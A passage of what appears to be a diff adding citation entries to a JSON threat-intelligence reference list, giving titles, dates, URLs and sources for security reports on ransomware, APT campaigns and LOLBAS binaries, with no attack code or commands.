"date_published": "2018-06-26T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ], + "source": "MITRE, Tidal Cyber", + "title": "RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families" + }, + "related": [], + "uuid": "45098a85-a61f-491a-a549-f62b02dc2ecd", + "value": "Rancor Unit42 June 2018" + }, + { + "description": "FBI. (n.d.). Ransomware. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "refs": [ + "https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf" + ], + "source": "MITRE", + "title": "Ransomware" + }, + "related": [], + "uuid": "54e296c9-edcc-5af7-99be-b118da29711f", + "value": "FBI-ransomware" + }, + { + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2020-09-28T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + ], + "source": "MITRE", + "title": "Ransomware 2020: Attack Trends Affecting Organizations Worldwide" + }, + "related": [], + "uuid": "eb767436-4a96-4e28-bd34-944842d7593e", + "value": "IBM Ransomware Trends September 2020" + }, + { + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "meta": { + "date_accessed": "2020-10-28T00:00:00Z", + "date_published": "2020-10-28T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + ], + "source": "MITRE, Tidal Cyber", + "title": "Ransomware Activity Targeting the Healthcare and Public Health Sector" + }, + "related": [], + "uuid": "984e86e6-32e4-493c-8172-3d29de4720cc", + "value": "DHS/CISA Ransomware Targeting Healthcare October 2020" + }, + { + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "meta": { + "date_accessed": "2021-03-02T00:00:00Z", + "date_published": "2020-02-24T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + ], + "source": "MITRE", + "title": "Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT" + }, + "related": [], + "uuid": "44856547-2de5-45ff-898f-a523095bd593", + "value": "FireEye Ransomware Feb 2020" + }, + { + "description": "Zafra, D. Lunden, K. Brubaker, N. Kennelly, J.. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved February 9, 2021.", + "meta": { + "date_accessed": "2021-02-09T00:00:00Z", + "date_published": "2020-02-24T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + ], + "source": "MITRE", + "title": "Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT" + }, + "related": [], + "uuid": "9ffa0f35-98e4-4265-8b66-9c805a2b6525", + "value": "FireEye Ransomware Disrupt Industrial Production" + }, + { + "description": "Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.", + "meta": { + "date_accessed": "2021-01-04T00:00:00Z", + "date_published": "2020-11-06T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/ransomware-alert-pay2key/" + ], + "source": "MITRE", + "title": "Ransomware Alert: Pay2Key" + }, + "related": [], + "uuid": "e4ea263d-f70e-4f9c-92a1-cb0e565a5ae9", + "value": "Check Point Pay2Key November 2020" + }, + { + "description": "Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.", + "meta": { + "date_accessed": "2023-03-10T00:00:00Z", + "date_published": "2022-05-09T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/" + ], + "source": "MITRE", + "title": "Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself" + }, + "related": [], + "uuid": "833018b5-6ef6-5327-9af5-1a551df25cd2", + "value": "Microsoft Ransomware as a Service" + }, + { + "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.", + "meta": { + "date_accessed": "2020-05-18T00:00:00Z", + "date_published": "2020-03-26T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/" + ], + "source": "MITRE", + "title": "Ransomware Maze" + }, + "related": [], + "uuid": "627a14dd-5300-4f58-869c-0ec91ffb664e", + "value": "McAfee Maze March 2020" + }, + { + "description": "Sivagnanam Gn, Sean Gallagher. (2020, December 16). Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2020-12-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://news.sophos.com/en-us/2020/12/16/systembc/" + ], + "source": "Tidal Cyber", + "title": "Ransomware operators use SystemBC RAT as off-the-shelf Tor backdoor" + }, + "related": [], + "uuid": "eca1301f-deeb-4a97-8c4e-e61210706116", + "value": "Sophos SystemBC December 16 2020" + }, + { + "description": "Trend Micro Research. (2022, April 4). Ransomware Spotlight AvosLocker. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2022-04-04T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker" + ], + "source": "MITRE", + "title": "Ransomware Spotlight AvosLocker" + }, + "related": [], + "uuid": "01fdc732-0951-59e2-afaf-5fe761357e7f", + "value": "Trend Micro AvosLocker Apr 2022" + }, + { + "description": "Trend Micro. (2022, September 1). Ransomware Spotlight Black Basta. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-09-01T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta" + ], + "source": "MITRE", + "title": "Ransomware Spotlight Black Basta" + }, + "related": [], + "uuid": "1f2942ab-e6a9-5a50-b266-3436c8c0b5ec", + "value": "Trend Micro Black Basta Spotlight September 2022" + }, + { + "description": "Trend Micro Research. (2022, February 8). Ransomware Spotlight: LockBit. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2022-02-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit" + ], + "source": "Tidal Cyber", + "title": "Ransomware Spotlight: LockBit" + }, + "related": [], + "uuid": "f72dade0-ec82-40e7-96a0-9f124d59bd35", + "value": "Trend Micro LockBit Spotlight February 08 2023" + }, + { + "description": "Trend Micro Research. (2023, July 21). Ransomware Spotlight: Play. Retrieved August 10, 2023.", + "meta": { + "date_accessed": "2023-08-10T00:00:00Z", + "date_published": "2023-07-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play" + ], + "source": "Tidal Cyber", + "title": "Ransomware Spotlight: Play" + }, + "related": [], + "uuid": "6cf9c6f0-7818-45dd-9afc-f69e394c23e4", + "value": "Trend Micro Play Spotlight July 21 2023" + }, + { + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.", + "meta": { + "date_accessed": "2020-08-05T00:00:00Z", + "date_published": "2020-05-01T00:00:00Z", + "refs": [ + "https://www.group-ib.com/whitepapers/ransomware-uncovered.html" + ], + "source": "MITRE", + "title": "Ransomware Uncovered: Attackers’ Latest Methods" + }, + "related": [], + "uuid": "18d20965-f1f4-439f-a4a3-34437ad1fe14", + "value": "Group IB Ransomware May 2020" + }, + { + "description": "joshhighet. (n.d.). ransomwatch. Retrieved June 30, 2023.", + "meta": { + "date_accessed": "2023-06-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/joshhighet/ransomwatch" + ], + "source": "Tidal Cyber", + "title": "ransomwatch" + }, + "related": [], + "uuid": "62037959-58e4-475a-bb91-ff360d20c1d7", + "value": "GitHub ransomwatch" + }, + { + "description": "mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://pypi.org/project/rarfile/" + ], + "source": "MITRE", + "title": "rarfile 3.1" + }, + "related": [], + "uuid": "e40d1cc8-b8c7-4f43-b6a7-c50a4f7bf1f0", + "value": "PyPI RAR" + }, + { + "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://www.rarlab.com/" + ], + "source": "MITRE", + "title": "RARLAB" + }, + "related": [], + "uuid": "c1334e4f-67c8-451f-b50a-86003f6e3d3b", + "value": "WinRAR Homepage" + }, + { + "description": "Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.", + "meta": { + "date_accessed": "2015-12-17T00:00:00Z", + "date_published": "2013-06-13T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/" + ], + "source": "MITRE", + "title": "RARSTONE Found In Targeted Attacks" + }, + "related": [], + "uuid": "2327592e-4e8a-481e-bdf9-d548c776adee", + "value": "Aquino RARSTONE" + }, + { + "description": "LOLBAS. (2020, January 10). Rasautou.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-01-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/" + ], + "source": "Tidal Cyber", + "title": "Rasautou.exe" + }, + "related": [], + "uuid": "dc299f7a-403b-4a22-9386-0be3e160d185", + "value": "Rasautou.exe - LOLBAS Project" + }, + { + "description": "Lauren Podber, Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-05-05T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/" + ], + "source": "Tidal Cyber", + "title": "Raspberry Robin gets the worm early" + }, + "related": [], + "uuid": "fb04d89a-3f39-48be-b986-9c4eac4dd8a4", + "value": "Red Canary Raspberry Robin May 2022" + }, + { + "description": "Microsoft Threat Intelligence. (2022, October 27). Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-10-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/" + ], + "source": "Tidal Cyber", + "title": "Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity" + }, + "related": [], + "uuid": "8017e42a-8373-4d24-8d89-638a925b704b", + "value": "Microsoft Security Raspberry Robin October 2022" + }, + { + "description": "Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.", + "meta": { + "date_accessed": "2018-11-26T00:00:00Z", + "date_published": "2018-08-02T00:00:00Z", + "refs": [ + "https://www.dragos.com/blog/20180802Raspite.html" + ], + "source": "MITRE", + "title": "RASPITE" + }, + "related": [], + "uuid": "bf4ccd52-0a03-41b6-bde7-34ead90171c3", + "value": "Dragos Raspite Aug 2018" + }, + { + "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", + "meta": { + "date_accessed": "2018-05-22T00:00:00Z", + "date_published": "2017-02-27T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" + ], + "source": "MITRE", + "title": "RATANKBA: Delving into Large-scale Watering Holes against Enterprises" + }, + "related": [], + "uuid": "7d08ec64-7fb8-4520-b26b-95b0dee891fe", + "value": "RATANKBA" + }, + { + "description": "TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.", + "meta": { + "date_accessed": "2017-10-04T00:00:00Z", + "date_published": "2015-04-01T00:00:00Z", + "refs": [ + "http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf" + ], + "source": "MITRE", + "title": "RawPOS Technical Brief" + }, + "related": [], + "uuid": "e483ed86-713b-42c6-ad77-e9b889bbcb81", + "value": "TrendMicro RawPOS April 2015" + }, + { + "description": "Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.", + "meta": { + "date_accessed": "2022-08-30T00:00:00Z", + "refs": [ + "https://rclone.org" + ], + "source": "MITRE", + "title": "Rclone syncs your files to cloud storage" + }, + "related": [], + "uuid": "3c7824de-d958-4254-beec-bc4e5ab989b0", + "value": "Rclone" + }, + { + "description": "Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.", + "meta": { + "date_accessed": "2022-08-30T00:00:00Z", + "date_published": "2021-05-04T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/" + ], + "source": "MITRE", + "title": "Rclone Wars: Transferring leverage in a ransomware attack" + }, + "related": [], + "uuid": "d47e5f7c-cf70-4f7c-ac83-57e4e1187485", + "value": "Rclone Wars" + }, + { + "description": "LOLBAS. (2018, May 25). rcsi.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/" + ], + "source": "Tidal Cyber", + "title": "rcsi.exe" + }, + "related": [], + "uuid": "dc02058a-7ed3-4253-a976-6f99b9e91406", + "value": "rcsi.exe - LOLBAS Project" + }, + { + "description": "Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", + "meta": { + "date_accessed": "2017-12-11T00:00:00Z", + "date_published": "2017-03-19T00:00:00Z", + "refs": [ + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + ], + "source": "MITRE", + "title": "RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation" + }, + "related": [], + "uuid": "0a615508-c155-4004-86b8-916bbfd8ae42", + "value": "RDP Hijacking Medium" + }, + { + "description": "Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M. Retrieved March 28, 2022.", + "meta": { + "date_accessed": "2022-03-28T00:00:00Z", + "date_published": "2014-10-22T00:00:00Z", + "refs": [ + "https://github.com/stascorp/rdpwrap" + ], + "source": "MITRE", + "title": "RDP Wrapper Library by Stas'M" + }, + "related": [], + "uuid": "777a0a6f-3684-4888-ae1b-adc386be763a", + "value": "RDPWrap Github" + }, + { + "description": "LOLBAS. (2022, May 18). rdrleakdiag.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-05-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/" + ], + "source": "Tidal Cyber", + "title": "rdrleakdiag.exe" + }, + "related": [], + "uuid": "1feff728-2230-4a45-bd64-6093f8b42646", + "value": "rdrleakdiag.exe - LOLBAS Project" + }, + { + "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.", + "meta": { + "date_accessed": "2017-03-09T00:00:00Z", + "date_published": "2017-02-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Read The Manual: A Guide to the RTM Banking Trojan" + }, + "related": [], + "uuid": "ab2cced7-05b8-4788-8d3c-8eadb0aaf38c", + "value": "ESET RTM Feb 2017" + }, + { + "description": "Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2013-05-20T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html" + ], + "source": "MITRE", + "title": "Ready for Summer: The Sunshop Campaign" + }, + "related": [], + "uuid": "ec246c7a-3396-46f9-acc4-a100cb5e5fe6", + "value": "FireEye Sunshop Campaign May 2013" + }, + { + "description": "STEPHEN ECKELS. (2022, February 28). Ready, Set, Go — Golang Internals and Symbol Recovery. Retrieved September 29, 2022.", + "meta": { + "date_accessed": "2022-09-29T00:00:00Z", + "date_published": "2022-02-28T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery" + ], + "source": "MITRE", + "title": "Ready, Set, Go — Golang Internals and Symbol Recovery" + }, + "related": [], + "uuid": "60eb0109-9655-41ab-bf76-37b17bf9594a", + "value": "Mandiant golang stripped binaries explanation" + }, + { + "description": "Microsoft, EliotSeattle, et al. (2022, August 18). REAgentC command-line options. Retrieved October 19, 2022.", + "meta": { + "date_accessed": "2022-10-19T00:00:00Z", + "date_published": "2022-08-18T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11" + ], + "source": "MITRE", + "title": "REAgentC command-line options" + }, + "related": [], + "uuid": "d26c830b-c196-5503-bf8c-4cfe90a6e7e5", + "value": "reagentc_cmd" + }, + { + "description": "Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2020-03-09T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team" + ], + "source": "MITRE", + "title": "Real-life cybercrime stories from DART, the Microsoft Detection and Response Team" + }, + "related": [], + "uuid": "bd8c6a86-1a63-49cd-a97f-3d119e4223d4", + "value": "Microsoft DART Case Report 001" + }, + { + "description": "Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2003-08-01T00:00:00Z", + "refs": [ + "https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411" + ], + "source": "MITRE", + "title": "Real World ARP Spoofing" + }, + "related": [], + "uuid": "1f9f5bfc-c044-4046-8586-39163a305c1e", + "value": "Sans ARP Spoofing Aug 2003" + }, + { + "description": "Github. (n.d.). Receiving webhooks with the GitHub CLI. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "refs": [ + "https://docs.github.com/en/webhooks-and-events/webhooks/receiving-webhooks-with-the-github-cli" + ], + "source": "MITRE", + "title": "Receiving webhooks with the GitHub CLI" + }, + "related": [], + "uuid": "8ddee62e-adc0-5b28-b271-4b14b01f84c1", + "value": "Github CLI Create Webhook" + }, + { + "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.", + "meta": { + "date_accessed": "2020-05-08T00:00:00Z", + "date_published": "2019-08-12T00:00:00Z", + "refs": [ + "https://securelist.com/recent-cloud-atlas-activity/92016/" + ], + "source": "MITRE", + "title": "Recent Cloud Atlas activity" + }, + "related": [], + "uuid": "4c3ae600-0787-4847-b528-ae3e8ff1b5ef", + "value": "Kaspersky Cloud Atlas August 2019" + }, + { + "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2019-05-20T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html" + ], + "source": "MITRE", + "title": "Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques" + }, + "related": [], + "uuid": "5b8b6429-14ef-466b-b806-5603e694efc1", + "value": "Talos MuddyWater May 2019" + }, + { + "description": "Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2017-12-24T00:00:00Z", + "refs": [ + "https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html" + ], + "source": "MITRE", + "title": "Recognized Desktop Entry Keys" + }, + "related": [], + "uuid": "4ffb9866-1cf4-46d1-b7e5-d75bd98de018", + "value": "Free Desktop Entry Keys" + }, + { + "description": "Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.", + "meta": { + "date_accessed": "2017-06-18T00:00:00Z", + "date_published": "2017-05-17T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/chinese-mss-behind-apt3/" + ], + "source": "MITRE", + "title": "Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3" + }, + "related": [], + "uuid": "a894d79f-5977-4ef9-9aa5-7bfec795ceb2", + "value": "Recorded Future APT3 May 2017" + }, + { + "description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.", + "meta": { + "date_accessed": "2017-12-27T00:00:00Z", + "date_published": "2017-11-07T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + ], + "source": "MITRE, Tidal Cyber", + "title": "REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography" + }, + "related": [], + "uuid": "4ca0e6a9-8c20-49a0-957a-7108083a8a29", + "value": "Trend Micro Daserf Nov 2017" + }, + { + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-03-14T00:00:00Z", + "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + ], + "source": "MITRE", + "title": "redhat Security Guide - Chapter 7 - System Auditing" + }, + "related": [], + "uuid": "cdedab06-7745-4a5e-aa62-00ed81ccc8d0", + "value": "RHEL auditd" + }, + { + "description": "Jahoda, M. et al.. (2017, March 14). Red Hat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-03-14T00:00:00Z", + "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + ], + "source": "MITRE", + "title": "Red Hat Security Guide - Chapter 7 - System Auditing" + }, + "related": [], + "uuid": "599337b3-8587-5578-9be5-e6e4f0edd0ef", + "value": "Red Hat System Auditing" + }, + { + "description": "Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2015-04-13T00:00:00Z", + "refs": [ + "https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf" + ], + "source": "MITRE", + "title": "Redirect to SMB" + }, + "related": [], + "uuid": "32c7626a-b284-424c-8294-7fac37e71336", + "value": "Cylance Redirect to SMB" + }, + { + "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "date_published": "2018-08-31T00:00:00Z", + "refs": [ + "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" + ], + "source": "MITRE", + "title": "Red Teaming Microsoft Part 1 Active Directory Leaks via Azure" + }, + "related": [], + "uuid": "48971032-8fa2-40ff-adef-e91d7109b859", + "value": "Black Hills Red Teaming MS AD Azure, 2018" + }, + { + "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2019-06-19T00:00:00Z", + "refs": [ + "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" + ], + "source": "MITRE", + "title": "Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR" + }, + "related": [], + "uuid": "c4c3370a-2d6b-4ebd-961e-58d584066377", + "value": "OutFlank System Calls" + }, + { + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2017-06-05T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/TA17-156A" + ], + "source": "MITRE", + "title": "Reducing the Risk of SNMP Abuse" + }, + "related": [], + "uuid": "82b814f3-2853-48a9-93ff-701d16d97535", + "value": "US-CERT TA17-156A SNMP Abuse 2017" + }, + { + "description": "Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2017-05-24T00:00:00Z", + "refs": [ + "https://blog.cloudflare.com/reflections-on-reflections/" + ], + "source": "MITRE", + "title": "Reflections on reflection (attacks)" + }, + "related": [], + "uuid": "a6914c13-f95f-4c30-a129-905ed43e3454", + "value": "Cloudflare ReflectionDoS May 2017" + }, + { + "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2020-05-18T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html" + ], + "source": "MITRE", + "title": "Reflective Loading Runs Netwalker Fileless Ransomware" + }, + "related": [], + "uuid": "2d4cb6f1-bc44-454b-94c1-88a81324903e", + "value": "Trend Micro" + }, + { + "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.", + "meta": { + "date_accessed": "2015-05-01T00:00:00Z", + "date_published": "2012-04-17T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc732643.aspx" + ], + "source": "MITRE", + "title": "Reg" + }, + "related": [], + "uuid": "1e1b21bd-18b3-4c77-8eb8-911b028ab603", + "value": "Microsoft Reg" + }, + { + "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/" + ], + "source": "MITRE", + "title": "Regasm.exe" + }, + "related": [], + "uuid": "b6a3356f-72c2-4ec2-a276-2432eb691055", + "value": "LOLBAS Regasm" + }, + { + "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", + "meta": { + "date_accessed": "2016-07-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" + ], + "source": "MITRE", + "title": "Regasm.exe (Assembly Registration Tool)" + }, + "related": [], + "uuid": "66a3de54-4a16-4b1b-b18f-e3842aeb7b40", + "value": "MSDN Regasm" + }, + { + "description": "Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.", + "meta": { + "date_accessed": "2018-08-10T00:00:00Z", + "date_published": "2016-07-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull" + ], + "source": "MITRE", + "title": "RegDelNull v1.11" + }, + "related": [], + "uuid": "d34d35ee-9d0b-4556-ad19-04cfa9001bf2", + "value": "Microsoft RegDelNull July 2016" + }, + { + "description": "LOLBAS. (2018, May 25). Regedit.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/" + ], + "source": "Tidal Cyber", + "title": "Regedit.exe" + }, + "related": [], + "uuid": "86e47198-751b-4754-8741-6dd8f2960416", + "value": "Regedit.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Reg.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Reg/" + ], + "source": "Tidal Cyber", + "title": "Reg.exe" + }, + "related": [], + "uuid": "ba0e31a1-125b-43c3-adf0-567ca393eeab", + "value": "Reg.exe - LOLBAS Project" + }, + { + "description": "Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.", + "meta": { + "date_accessed": "2018-08-09T00:00:00Z", + "date_published": "2006-01-10T00:00:00Z", + "refs": [ + 